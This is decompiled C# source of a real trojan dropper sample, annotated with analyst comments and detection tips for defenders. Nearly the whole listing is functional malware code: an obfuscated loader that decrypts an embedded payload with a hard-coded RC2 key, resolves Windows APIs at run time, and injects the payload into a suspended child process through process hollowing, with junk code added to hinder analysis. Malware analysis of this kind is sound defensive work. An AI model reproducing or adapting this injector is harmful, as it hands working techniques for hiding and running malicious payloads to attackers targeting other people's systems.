// Decompiled with JetBrains decompiler
// Type: Â4gÌµÒ
// Assembly: bbsx3kxh, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: FF3146BD-161B-4924-BABD-AF97B1A59012
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Injector.oif-6c38ff7447d62661b0227594bb34a43fd9e95cc53db7c375cb079d41ef678d22.exe

// ANALYST SUMMARY (annotations only; the code below is unchanged decompiler output).
//
// What the listing shows, in execution order:
//   1. Main() takes a named mutex (name stored encrypted) and exits if it is already held.
//   2. Main() loads an object from the embedded resource set "5txj2rf4", decrypts it with Ú()
//      and hands the resulting byte[] to ÍÔÚÆ4Ö().
//   3. ÍÔÚÆ4Ö() resolves native exports at run time through LoadLibraryA/GetProcAddress
//      (names stored encrypted), starts a second process, writes the decrypted buffer into it
//      region by region, updates the child's thread context and lets the thread run.
//
// NOTE(review): the call sequence and constants are consistent with process hollowing
// (MITRE ATT&CK T1055.012). The export names are encrypted on this page, so every API name
// given in the comments below is inferred from delegate shape and constants - confirm by
// decrypting the strings.
//
// Triage pointers for defenders:
//   - All strings and the payload use one fixed key/IV derived from a 15-byte constant in Ú(),
//     so they can be recovered statically without running the sample.
//   - Behavioural telemetry worth checking: a managed executable creating a suspended child,
//     cross-process memory writes into that child, a thread-context change, then resume
//     (for example Sysmon Event ID 25 "ProcessTampering", or the EDR equivalent).
//   - Identifiers are obfuscated. The class name is rendered two ways on this page
//     ("Â4gÌµÒ" in the header/declaration, "Â4g̵Ò" at call sites); this looks like an
//     encoding artefact of the extraction, not two different types.
//   - The listing is not guaranteed to recompile as shown (e.g. num5 is read without ever
//     being assigned), which is typical of decompiler output.
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;

[StandardModule]
internal sealed class Â4gÌµÒ
{
  // Never read anywhere in this listing.
  private static DateTime roy = DateTime.Now;

  // P/Invoke declaration against "irprops" that is never called in this listing;
  // presumably filler added by the obfuscator.
  [DllImport("irprops", CharSet = CharSet.Ansi, SetLastError = true)]
  public static extern long wjØÜÙ5(Decimal Ø0ÆÜÏ, float ÿÂ, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ÙÂÄi, int nÖÁs, int Þ);

  // Decrypts a buffer with RC2 and returns the plaintext bytes.
  //   ÖÓ  - ciphertext to decrypt in one TransformFinalBlock call.
  //   ÂÞÖ - never read; the different constants callers pass here have no effect.
  // Key and IV both come from Rfc2898DeriveBytes using the same hard-coded 15-byte array as
  // password AND salt with an iteration count of 1, so the key material is a constant of the
  // binary. Cipher mode and padding are left at the provider defaults.
  // Defender note: the 15-byte array is a stable byte pattern that can serve as a static signature.
  public static byte[] Ú(byte[] ÖÓ, ulong ÂÞÖ)
  {
    byte[] numArray = new byte[15] { (byte) 148, (byte) 74, (byte) 150, (byte) 90, (byte) 73, (byte) 141, (byte) 130, (byte) 53, (byte) 227, (byte) 101, (byte) 78, (byte) 143, (byte) 151, (byte) 168, (byte) 55 };
    using (RC2CryptoServiceProvider cryptoServiceProvider = new RC2CryptoServiceProvider())
    {
      Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(numArray, numArray, 1);
      int num1 = true ? 1 : 0; // dead store
      // First GetBytes call yields the key (KeySize bits), the next one continues the same
      // derivation stream and yields the IV (BlockSize bits).
      cryptoServiceProvider.Key = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) cryptoServiceProvider.KeySize / 8.0));
      int num2 = true ? 1 : 0; // dead store
      cryptoServiceProvider.IV = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) cryptoServiceProvider.BlockSize / 8.0));
      return cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(ÖÓ, 0, ÖÓ.Length);
    }
  }

  // String decryptor: Base64-decodes Æy9, decrypts it with Ú() and returns the UTF-8 text.
  // The sbyte and byte parameters are never read; the varying values at call sites are noise.
  public static string ÎtÊkÏ(sbyte x0Îß, string Æy9, byte p0j59Ë) => Encoding.UTF8.GetString(Â4g̵Ò.Ú(Convert.FromBase64String(Æy9), 2079907628UL));

  // The only two native imports declared by name; everything else is resolved through them,
  // so the import table does not list the process-manipulation APIs that are actually used.
  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
  public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string ÀdÉ);

  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
  public static extern IntPtr GetProcAddress(IntPtr ÀdÉ, [MarshalAs(UnmanagedType.VBByRefStr)] ref string ÆØÎÓÍi);

  // Run-time resolver: splits the argument on ':' (char 58) into a library part and an export
  // part, loads the library, looks up the export and wraps the address in a delegate of the
  // requested type. Neither return value is checked before use.
  public static ÆØÎÓÍi ÀdÉ<ÆØÎÓÍi>(string ÀÆ4th) => (ÆØÎÓÍi) Marshal.GetDelegateForFunctionPointer(Â4g̵Ò.GetProcAddress(Â4g̵Ò.LoadLibraryA(ref ÀÆ4th.Split(Convert.ToChar(58))[0]), ref ÀÆ4th.Split(Convert.ToChar(58))[1]), typeof (ÆØÎÓÍi));

  // Injection routine.
  //   ßq5     - never read.
  //   ÍÔÚÆ4Ö  - decrypted payload buffer; parsed below at fixed header offsets.
  //   ÂÜ4vn   - never read.
  // NOTE(review): most encrypted "library:export" strings below share the ciphertext prefix
  // "AkfNk3cb8F"; with a fixed key/IV and an 8-byte block that implies the same first eight
  // plaintext characters, i.e. presumably the same library. One string differs, which would
  // fit a second library. Confirm by decrypting.
  public static void ÍÔÚÆ4Ö(sbyte ßq5, byte[] ÍÔÚÆ4Ö, DateTime ÂÜ4vn)
  {
    // Junk loop: counts to 101 and the result is never used.
    int num1 = 0;
    do
    {
      ++num1;
    }
    while (num1 <= 100);
    short num2 = 2302; // only incremented below, never read
    // Default host image for the child process: this executable itself.
    string Ækÿ1 = Assembly.GetEntryAssembly().Location;
    // Junk nested loop with no observable effect.
    byte num3 = 0;
    do
    {
      int num4 = (int) num3;
      while (num4 <= 30 && num4 != 25)
        ++num4;
      ++num3;
    }
    while (num3 <= (byte) 20);
    // Optional host override: if <system drive letter> + decrypted path exists, enumerate the
    // sub-directories of a second decrypted path and, for the first one whose name contains a
    // decrypted marker, use <that directory> + decrypted suffix as the host image instead.
    // The four path fragments are encrypted; they are useful indicators once decrypted.
    if (Directory.Exists(Conversions.ToString(Environment.SystemDirectory[0]) + Â4g̵Ò.ÎtÊkÏ((sbyte) -16, "pGJxb0xgkIehL44+nj3Q/9x1lEr7/J1M", (byte) 160)))
    {
      foreach (string directory in Directory.GetDirectories(Conversions.ToString(Environment.SystemDirectory[0]) + Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "IPn3YJa+m5hRy0MfiKSHKcW4u/x8vRHeXlnXHaq4wBdaV4j/b6aXZQ==", (byte) 0)))
      {
        if (directory.Contains(Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "GY1x7BFYPAg=", (byte) 190)))
        {
          Ækÿ1 = directory + Â4g̵Ò.ÎtÊkÏ((sbyte) -101, "nMHLqIYdLp7jqju8IneUbA==", (byte) 211);
          Guid.NewGuid(); // result discarded - junk
          break;
        }
        ++num2;
      }
    }
    byte[] numArray1 = new byte[6] { (byte) 0, (byte) 1, (byte) 2, (byte) 3, (byte) 4, (byte) 5 }; // junk, later set to null
    int[] numArray2 = new int[8] { 1, 16, 2, 32, 4, 64, 4, 64 }; // never read
    bool flag1 = false; // written several times, never read
    // NOTE(review): the offsets used from here on match the PE32 header layout
    // (60 = offset of the NT headers; +6 = number of sections; +84 = size of headers;
    // +52 = preferred image base; +80 = size of image; +40 = entry-point RVA;
    // +248 = first section header, 40 bytes each) - confirm against the decrypted resource.
    // None of these reads is bounds-checked against the buffer length.
    int int32 = BitConverter.ToInt32(ÍÔÚÆ4Ö, 60);
    int int16 = (int) BitConverter.ToInt16(ÍÔÚÆ4Ö, int32 + 6);
    IntPtr qgÅ1 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 84));
    // Filled by the first native call; used below as [0] process handle, [1] thread handle,
    // [2] process id.
    IntPtr[] q = new IntPtr[4];
    IntPtr num5; // read below without assignment - decompiler artefact
    // Step 1: start the host image. NOTE(review): ten parameters with the flags value 4 are
    // consistent with CreateProcessA and CREATE_SUSPENDED. On failure the routine just returns.
    if (!Â4g̵Ò.ÀdÉ<Â4g̵Ò.ÙÉeÇ>(Â4g̵Ò.ÎtÊkÏ((sbyte) 86, "AkfNk3cb8FEj8mhR0MvaqFTiDyY1kC65", (byte) 125))((string) null, Ækÿ1, num5, num5, false, 4, num5, (string) null, new byte[0], q))
      return;
    try
    {
      flag1 = true;
      // Step 2: fetch the child's thread context into a 179-uint buffer.
      // NOTE(review): 179 * 4 = 716 bytes with flags 65538 (0x10002) is consistent with the
      // 32-bit x86 CONTEXT structure requesting the integer registers - confirm.
      uint[] Ækÿ2 = new uint[179];
      Ækÿ2[0] = 65538U;
      if (Â4g̵Ò.ÀdÉ<Â4g̵Ò.ÑÀ>(Â4g̵Ò.ÎtÊkÏ((sbyte) -5, "AkfNk3cb8FHcThQeZcujxt1yReBRDsECGlDssfI1oHc=", (byte) 147))(q[1], Ækÿ2))
      {
        IntPtr iÌ4_1;
        IntPtr Á7xÿßx;
        // Step 3: read 4 bytes from the child at (context slot 41) + 8.
        // NOTE(review): presumably the child's current image base - confirm.
        if (Â4g̵Ò.ÀdÉ<Â4g̵Ò.b>(Â4g̵Ò.ÎtÊkÏ((sbyte) -82, "AkfNk3cb8FH7avFy2XdgEvMsHes5Kn4PhPATuavLveE=", (byte) 12))(q[0], new IntPtr((long) Ækÿ2[41] + 8L), ref iÌ4_1, new IntPtr(4), ref Á7xÿßx))
        {
          // Step 4: call a (process, address) export on the value just read and continue only
          // if it returns 0. NOTE(review): this is the string with the different ciphertext
          // prefix; the shape fits an unmap-view call from a second library - confirm.
          if (Â4g̵Ò.ÀdÉ<Â4g̵Ò.g_6nyl>(Â4g̵Ò.ÎtÊkÏ((sbyte) -119, "3pV6uVVnE5WOo9hXjwjtIuY27hF/nopxTKw6Oaxw6jo=", (byte) 157))(q[0], iÌ4_1) == 0U)
          {
            // Step 5: reserve memory in the child at the payload's header-declared base and size.
            // NOTE(review): 12288 (0x3000) and 64 (0x40) match MEM_COMMIT|MEM_RESERVE and
            // PAGE_EXECUTE_READWRITE. A read-write-execute region of this kind is a common
            // memory-scanner indicator.
            Â4g̵Ò.v v = Â4g̵Ò.ÀdÉ<Â4g̵Ò.v>(Â4g̵Ò.ÎtÊkÏ((sbyte) -115, "AkfNk3cb8FG4XDtrNYQh6ncBWjrHHpGG", (byte) 128));
            IntPtr ÍÔÚÆ4Ö1 = q[0];
            IntPtr num6 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 52));
            IntPtr Ækÿ3 = num6;
            IntPtr num7 = new IntPtr(BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 80));
            IntPtr iÌ4_2 = num7;
            IntPtr Ækÿ4 = v(ÍÔÚÆ4Ö1, Ækÿ3, iÌ4_2, 12288, 64);
            // Step 6: cross-process write of the payload headers (qgÅ1 bytes) to the new
            // region. The boolean results of this and the later writes are stored in flag2
            // but never checked.
            Â4g̵Ò.ØÄ øä1 = Â4g̵Ò.ÀdÉ<Â4g̵Ò.ØÄ>(Â4g̵Ò.ÎtÊkÏ((sbyte) 72, "AkfNk3cb8FEW+TPPCclD8bWYWAftEoHWMhh1KGWdx2Q=", (byte) 35));
            numArray1 = (byte[]) null;
            bool flag2 = øä1(q[0], Ækÿ4, ÍÔÚÆ4Ö, qgÅ1, ref Á7xÿßx);
            // Step 7: one write per section-table entry.
            int[] dst1 = new int[10];
            int num8 = int16 - 1;
            for (int index = 0; index <= num8; ++index)
            {
              // These two stores are overwritten by the 40-byte BlockCopy below - junk.
              dst1[0] = 15;
              dst1[5] = 223 + dst1[0];
              // Load the 40-byte entry as ten ints. NOTE(review): in a PE section header
              // [3] = virtual address, [4] = raw size, [5] = raw file offset.
              Buffer.BlockCopy((Array) ÍÔÚÆ4Ö, int32 + 248 + index * 40, (Array) dst1, 0, 40);
              byte[] dst2 = new byte[dst1[4] - 1 + 1];
              flag1 = false;
              dst1.Length.ToString(); // result discarded - junk
              Buffer.BlockCopy((Array) ÍÔÚÆ4Ö, dst1[5], (Array) dst2, 0, dst2.Length);
              Â4g̵Ò.ØÄ øä2 = øä1;
              IntPtr ÍÔÚÆ4Ö2 = q[0];
              // Destination = allocated base + entry[3]; ToInt32 limits this to 32-bit addresses.
              num7 = new IntPtr(Ækÿ4.ToInt32() + dst1[3]);
              IntPtr Ækÿ5 = num7;
              byte[] iÌ4_3 = dst2;
              num6 = new IntPtr(dst2.Length);
              IntPtr qgÅ2 = num6;
              ref IntPtr local = ref Á7xÿßx;
              flag2 = øä2(ÍÔÚÆ4Ö2, Ækÿ5, iÌ4_3, qgÅ2, ref local);
            }
            // Step 8: write the new base address (4 bytes) back to the location read in step 3.
            Â4g̵Ò.ØÄ øä3 = øä1;
            IntPtr ÍÔÚÆ4Ö3 = q[0];
            num7 = new IntPtr((long) Ækÿ2[41] + 8L);
            IntPtr Ækÿ6 = num7;
            byte[] bytes = BitConverter.GetBytes(Ækÿ4.ToInt32());
            num6 = new IntPtr(4);
            IntPtr qgÅ3 = num6;
            ref IntPtr local1 = ref Á7xÿßx;
            flag2 = øä3(ÍÔÚÆ4Ö3, Ækÿ6, bytes, qgÅ3, ref local1);
            // Step 9: set context slot 44 to base + header field at +40 and apply the context
            // to the child's thread. NOTE(review): presumably redirects the start address to
            // the payload's entry point - confirm.
            Ækÿ2[44] = (uint) (Ækÿ4.ToInt32() + BitConverter.ToInt32(ÍÔÚÆ4Ö, int32 + 40));
            int num9 = Â4g̵Ò.ÀdÉ<Â4g̵Ò.ÑÀ>(Â4g̵Ò.ÎtÊkÏ((sbyte) -66, "AkfNk3cb8FEzYHHijFbTn+Bvu/hlKwVIJHW2Tl7CQI0=", (byte) 34))(q[1], Ækÿ2) ? 1 : 0;
            flag1 = true;
            // Step 10: single-argument call on the thread handle. NOTE(review): fits a
            // resume-thread call. The return below is the only success exit of the routine.
            int num10 = Â4g̵Ò.ÀdÉ<Â4g̵Ò.Ñ7>(Â4g̵Ò.ÎtÊkÏ((sbyte) 0, "AkfNk3cb8FFMOoT7qlSi1WE1Lh7B3VwP", (byte) 161))(q[1]);
            return;
          }
        }
      }
    }
    catch (Exception ex)
    {
      // Exception is recorded and immediately cleared: failures are silent.
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
    // Reached only when a step failed or threw: terminate the child by process id so no
    // half-prepared process is left behind. A short-lived child that is killed by its own
    // parent is a secondary indicator of a failed attempt.
    Process.GetProcessById(q[2].ToInt32()).Kill();
  }

  // Entry point: single-instance guard, then decrypt the embedded resource and inject it.
  [STAThread]
  public static void Main()
  {
    // Non-blocking acquire of a named mutex; the name is encrypted and becomes a host-based
    // indicator once decrypted. If it is already held, the process ends.
    if (!new Mutex(false, Â4g̵Ò.ÎtÊkÏ((sbyte) 92, "r8XKtD49yqjBI+4aIG/OWWVanFCpcao5BzrVog0ovWrjymBH2XgD4p6xQf0dyhsY", (byte) 33)).WaitOne(0, false))
      ProjectData.EndApp();
    // The payload is the object stored under a decrypted key in the resource set "5txj2rf4",
    // cast to byte[] and decrypted with the same fixed key as the strings.
    Â4g̵Ò.ÍÔÚÆ4Ö((sbyte) -27, Â4g̵Ò.Ú((byte[]) new ResourceManager("5txj2rf4", Assembly.GetExecutingAssembly()).GetObject(Â4g̵Ò.ÎtÊkÏ((sbyte) 113, "eAq5iK8LUXk=", (byte) 82)), 856643351UL), DateTime.Now);
  }

  // Nested class and delegates that nothing in this listing references; presumably filler.
  public class ÀßdÊbq
  {
    [DebuggerNonUserCode]
    public ÀßdÊbq()
    {
    }

    public delegate double zÏaÔ(sbyte ÛÓ, uint ËlÇ, bool ÉÀjÏr, ulong Äm, string Ào1);

    public delegate void ceq64v();
  }

  // Delegate types for the dynamically resolved exports. The parameter names are obfuscated;
  // the shapes are what ties each delegate to a step in ÍÔÚÆ4Ö() above.

  // Step 1 (process start); the last parameter receives the four handle/id values.
  public delegate bool ÙÉeÇ(
    string ÍÔÚÆ4Ö,
    string Ækÿ,
    IntPtr iÌ4,
    IntPtr qgÅ,
    bool Á7xÿßx,
    int mÀu,
    IntPtr ÖÌ,
    string ÿÂÃÚu,
    byte[] Ü3,
    IntPtr[] q);

  // Steps 2 and 9 (get / set thread context): thread handle plus context buffer.
  public delegate bool ÑÀ(IntPtr ÍÔÚÆ4Ö, uint[] Ækÿ);

  // Step 3 (read from the child's memory).
  public delegate bool b(
    IntPtr ÍÔÚÆ4Ö,
    IntPtr Ækÿ,
    ref IntPtr iÌ4,
    IntPtr qgÅ,
    ref IntPtr Á7xÿßx);

  // Step 4 (process handle, address); a return value of 0 is treated as success.
  public delegate uint g_6nyl(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ);

  // Step 5 (allocate in the child): handle, address, size, allocation type, protection.
  public delegate IntPtr v(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, IntPtr iÌ4, int qgÅ, int Á7xÿßx);

  // Steps 6-8 (write into the child's memory).
  public delegate bool ØÄ(IntPtr ÍÔÚÆ4Ö, IntPtr Ækÿ, byte[] iÌ4, IntPtr qgÅ, ref IntPtr Á7xÿßx);

  // Step 10 (single call on the thread handle).
  public delegate int Ñ7(IntPtr ÍÔÚÆ4Ö);
}